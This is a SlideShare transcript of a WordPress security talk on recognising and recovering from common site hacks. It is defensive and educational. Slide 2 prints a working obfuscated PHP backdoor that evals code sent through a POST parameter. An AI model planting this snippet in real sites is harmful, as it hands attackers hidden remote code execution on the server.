SlideShare une entreprise Scribd logo
1  sur  38
Télécharger pour lire hors ligne
YOUR SITE 

IS AND IS NOT
HACKED
@ASKWPGIRL #WCSLC
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not
hacked until you open the box and find out.
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].
$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($
{$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 —Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman 

Ask WP Girl @askwpgirl
WHAAA?
1
WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web
neighborhoods (SEO spam)
Hijack site to add spam, porn,
gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal
computers
Use server resources for 

distributed attacks
WHAT DO HACKERS
ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to existing files
or new files
Redirect your website
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
Gravity Forms hack
WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
TYPICALLY, ONLY THE
MOST SEVERELY HACKED
SITES WILL BE
BLACKLISTED OR
SUSPENDED BY HOST
Many hacks are hidden
WHY ARE WORDPRESS
SITES VULNERABLE?
29%
8%
22%
41%
41% Hosting
22% Plugins
29% Themes
8% Weak
Passwords
RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak
passwords, install tons of plugins, use not-great web hosting
COMMON
EXPLOITS AND
HOW TO FIX
2
“SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
A
B
C
1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely
affect site and server performance. Not easy to find.
IT'S VERY COMMON, THAT
BACKDOORS DON'T HAVE
ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S
IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE
INFECTED SITE FROM
OUTSIDE. ~ SUCURI
2 - Drive by Downloads
Script injected on website generates links to malware sites or
downloads malware from your site to visitors’ computers.
Easy for scanners to detect.
3 - Pharma Hack
Spam links injected onto web pages only visible to search
engines. Difficult to scan for because cloaked.
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
4 - Malicious Redirects
Redirects traffic from your website to another typically by
modifying the .htaccess file, sometimes only when viewed by a
particular device or browser, like a phone
Hacked .htaccess file
DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup:
Download
everything. Good to
examine later for
details of hack if
needed.
2 Delete 

all except:
cgi-bin
.htaccess
wp-config.php
(examine these)
3 Upload fresh:
WordPress
Themes
Plugins
cleaned uploads
Why are people from
Thailand and Romania
accessing a strangely
named PHP file
somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
Check WordPress core integrity
using Sucuri plugin https://
wordpress.org/plugins/sucuri-
scanner/
Run https://wordpress.org/
plugins/gotmls/ to check 

wp-content folder
Look for modified dates, 

unusual names, file types 

that don’t belong
Compare file list to original
download
Commonly hacked files: .htaccess,
wp-config.php, index.php,
functions.php, header.php
Any file can be hacked!
Finding PHP Back Doors
Hmmmm? PHP in a CSS folder?
Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to
visit your site and couldn’t and find out which browser
or device they were using at the time.
Use http://www.botsvsbrowsers.com/
SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove
the redirect.
https://sitecheck.sucuri.net/
Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to you site.
Links toYour Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
IMMEDIATELY CHANGE
PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress 

users, FTP, web hosting, control panel
Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site or database,
you might have to nuke the entire site from orbit
— it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact
sucuri.net for 

site clean up and
monitoring
REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing
scam, you will need to request a review after you are
certain you’ve cleaned up all hacked files:

https://support.google.com/webmasters/answer/
168328?hl=en
SECURITY
BASICS
3
UPDATE UPDATE UPDATE
Timely updates are critical for security. 

Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGIN
Online Generator: 

http://www.pctools.com/guides/password/
Track Passwords: 

http://agilebits.com/products/1Password
Enable Two-Factor Authentication:
http://askwpgirl.com/wordpress-two-factor-
authentication-plugins/
Avoid logging in on 

public WiFi Networks

RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam
filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:
Site Ground
WP Engine
Get Flywheel
Web Synthesis
Pantheon
EFFECTIVE SECURITY
PLUGIN FEATURES
Limit login access
Block bad URL requests 

with a Firewall
Audit activity

Security through obscurity is not security
IP addresses don’t matter and should not be used as the
foundation of aWordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more.Will notify you of vulnerable plugins.
BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health
care coverage is to your health
Usually only helpful in case of a disaster
Services:
VaultPress and
WorpDrive good
hosted solutions!
Plugins:
BackupBuddy (paid),
BackWPUp,
Duplicator
SECURE YOUR COMPUTER
Scan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCES
http://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring, 

great posts on how to clean up specific hacks
http://aswkpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-
login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-
misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACT
facebook.com/askwpgirl


twitter.com/askwpgirl


http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday
of every month at Boulder Digital Arts
Six-week theme customization course
in Colorado and online.
SEO and Best Maintenance Tips
Newsletter http://askwpgirl.com

Contenu connexe

Tendances

Intro to WordPress Plugin Development
Intro to WordPress Plugin DevelopmentIntro to WordPress Plugin Development
Intro to WordPress Plugin DevelopmentBrad Williams
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
 
Securing Word Press Blog
Securing Word Press BlogSecuring Word Press Blog
Securing Word Press BlogChetan Gole
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
Introduction to WordPress Security
Introduction to WordPress SecurityIntroduction to WordPress Security
Introduction to WordPress SecurityShawn Hooper
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupOyster Bay Marauders LLC
 
5 Things You Shouldn't Do With A WordPress Plugin
5 Things You Shouldn't Do With A WordPress Plugin5 Things You Shouldn't Do With A WordPress Plugin
5 Things You Shouldn't Do With A WordPress PluginKelly Phillips
 
WordPress Security Essentials
WordPress Security EssentialsWordPress Security Essentials
WordPress Security EssentialsAngela Bowman
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014Technical SEO: Crawl Space Management - SEOZone Istanbul 2014
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014Bastian Grimm
 
WordPress for beginners lesson 4 fall2015 JALC
WordPress for beginners lesson 4 fall2015 JALCWordPress for beginners lesson 4 fall2015 JALC
WordPress for beginners lesson 4 fall2015 JALCMichele Butcher-Jones
 
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Vlad Lasky
 
Getting started with WordPress development
Getting started with WordPress developmentGetting started with WordPress development
Getting started with WordPress developmentSteve Mortiboy
 
WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013Brad Williams
 
Word campktm speed-security
Word campktm speed-securityWord campktm speed-security
Word campktm speed-securityDigamber Pradhan
 
Higher Order WordPress Security
Higher Order WordPress SecurityHigher Order WordPress Security
Higher Order WordPress SecurityDougal Campbell
 

Tendances (20)

Intro to WordPress Plugin Development
Intro to WordPress Plugin DevelopmentIntro to WordPress Plugin Development
Intro to WordPress Plugin Development
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! website
 
Securing Word Press Blog
Securing Word Press BlogSecuring Word Press Blog
Securing Word Press Blog
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security Presentation
 
Introduction to WordPress Security
Introduction to WordPress SecurityIntroduction to WordPress Security
Introduction to WordPress Security
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP Meetup
 
WordPress Security 101
WordPress Security 101WordPress Security 101
WordPress Security 101
 
5 Things You Shouldn't Do With A WordPress Plugin
5 Things You Shouldn't Do With A WordPress Plugin5 Things You Shouldn't Do With A WordPress Plugin
5 Things You Shouldn't Do With A WordPress Plugin
 
WordPress Security Essentials
WordPress Security EssentialsWordPress Security Essentials
WordPress Security Essentials
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
 
Website security
Website securityWebsite security
Website security
 
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014Technical SEO: Crawl Space Management - SEOZone Istanbul 2014
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014
 
WordPress for beginners lesson 4 fall2015 JALC
WordPress for beginners lesson 4 fall2015 JALCWordPress for beginners lesson 4 fall2015 JALC
WordPress for beginners lesson 4 fall2015 JALC
 
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
 
Getting started with WordPress development
Getting started with WordPress developmentGetting started with WordPress development
Getting started with WordPress development
 
WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
Word campktm speed-security
Word campktm speed-securityWord campktm speed-security
Word campktm speed-security
 
Seozone - 5 tips
Seozone  - 5 tips Seozone  - 5 tips
Seozone - 5 tips
 
Higher Order WordPress Security
Higher Order WordPress SecurityHigher Order WordPress Security
Higher Order WordPress Security
 

Similaire à Is Your Site Hacked? Check for these Common WordPress Exploits

Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Bastian Grimm
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security pptCheap SSL Coupon Code
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening StepsPlasterdog Web Design
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyondamiable_indian
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009Brad Williams
 
Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)Bastian Grimm
 
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017WordPress security 101 - WP Jyväskylä Meetup 21.3.2017
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017Otto Kekäläinen
 

Similaire à Is Your Site Hacked? Check for these Common WordPress Exploits (20)

Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 
Locking down word press
Locking down word pressLocking down word press
Locking down word press
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside Out
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security ppt
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening Steps
 
Pubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas  Session - WordPress Site Security AuditsPubcon Vegas  Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security Audits
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyond
 
WordPress security
WordPress securityWordPress security
WordPress security
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
WordPress Security
WordPress Security WordPress Security
WordPress Security
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009
 
Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)
 
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017WordPress security 101 - WP Jyväskylä Meetup 21.3.2017
WordPress security 101 - WP Jyväskylä Meetup 21.3.2017
 

Dernier

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Dernier (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Is Your Site Hacked? Check for these Common WordPress Exploits

  • 1. YOUR SITE 
 IS AND IS NOT HACKED @ASKWPGIRL #WCSLC
  • 2. SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
  • 3. WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman 
 Ask WP Girl @askwpgirl
  • 5. WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for 
 distributed attacks
  • 6. WHAT DO HACKERS ACTUALLY DO? Create admin account Reset passwords Inject malicious code into content Add malicious code to existing files or new files Redirect your website http://www.wpmayor.com/wordpress-security-based-facts-statistics/ Gravity Forms hack
  • 7. WHY SHOULD YOU CARE? Performance issues SEO tanks Blacklisting or Phish Tank Account closed Angry customers
  • 8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
  • 9. WHY ARE WORDPRESS SITES VULNERABLE? 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
  • 10. RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
  • 11. LOW HANGING FRUIT Vulnerabilities immediately published on the web Hackers write bots to exploit vulnerabilities Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
  • 13. “SPOT THE HACK” GAME A - Scan Site B - Look at files on server C - Find the hacked code A B C
